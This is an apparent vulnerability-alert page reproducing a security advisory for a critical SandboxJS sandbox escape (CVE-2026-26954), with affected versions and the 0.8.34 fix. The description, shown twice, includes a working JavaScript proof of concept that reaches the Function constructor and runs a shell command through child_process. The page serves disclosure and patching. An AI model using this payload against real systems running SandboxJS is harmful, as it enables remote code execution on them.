Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
10.0
SandboxJS allows attackers to execute arbitrary system commands
GHSA-6r9f-759j-hjgv
CVE-2026-26954
Summary
Attackers can use a specific technique to escape the restrictions of SandboxJS, potentially allowing them to execute system commands and gain unauthorized access to a system. This is a significant risk, as it could allow an attacker to take control of a system. To mitigate this risk, update to a patched version of SandboxJS or consider alternative sandboxing solutions.
What to do
- Update nyariv sandboxjs to version 0.8.34.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| nyariv | sandboxjs | <= 0.8.33 | 0.8.34 |
Original title
SandboxJS affected by a Sandbox Escape
Original description
### Summary
It is possible to obtain arrays containing `Function`, which allows escaping the sandbox.
### Details
There are various ways to get an array containing `Function`, e.g.
```js
Object.entries(this).at(1) // [ 'Function', [Function: Function] ]
Object.values(this).slice(1, 2) // [ [Function: Function] ]
```
Given an array containing `Function`, and `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox.
### PoC
```js
const s = require('.').default;
const sb = new s();
payload = `
const p = (async function () {})();
({
"finally": p.finally,
...Object.fromEntries([['then', ...Object.values(this).slice(1)]]),
}).finally('a=process.getBuiltinModule("child_process").execSync("ls", {stdio: "inherit"})')();
`;
sb.compile(payload)().run();
```
### Impact
Sandbox Escape -> RCE
It is possible to obtain arrays containing `Function`, which allows escaping the sandbox.
### Details
There are various ways to get an array containing `Function`, e.g.
```js
Object.entries(this).at(1) // [ 'Function', [Function: Function] ]
Object.values(this).slice(1, 2) // [ [Function: Function] ]
```
Given an array containing `Function`, and `Object.fromEntries`, it is possible to construct `{[p]: Function}` where `p` is any constructible property. This can be used to escape the sandbox.
### PoC
```js
const s = require('.').default;
const sb = new s();
payload = `
const p = (async function () {})();
({
"finally": p.finally,
...Object.fromEntries([['then', ...Object.values(this).slice(1)]]),
}).finally('a=process.getBuiltinModule("child_process").execSync("ls", {stdio: "inherit"})')();
`;
sb.compile(payload)().run();
```
### Impact
Sandbox Escape -> RCE
ghsa CVSS3.1
10.0
Vulnerability type
CWE-94
Code Injection
Published: 13 Mar 2026 · Updated: 14 Mar 2026 · First seen: 13 Mar 2026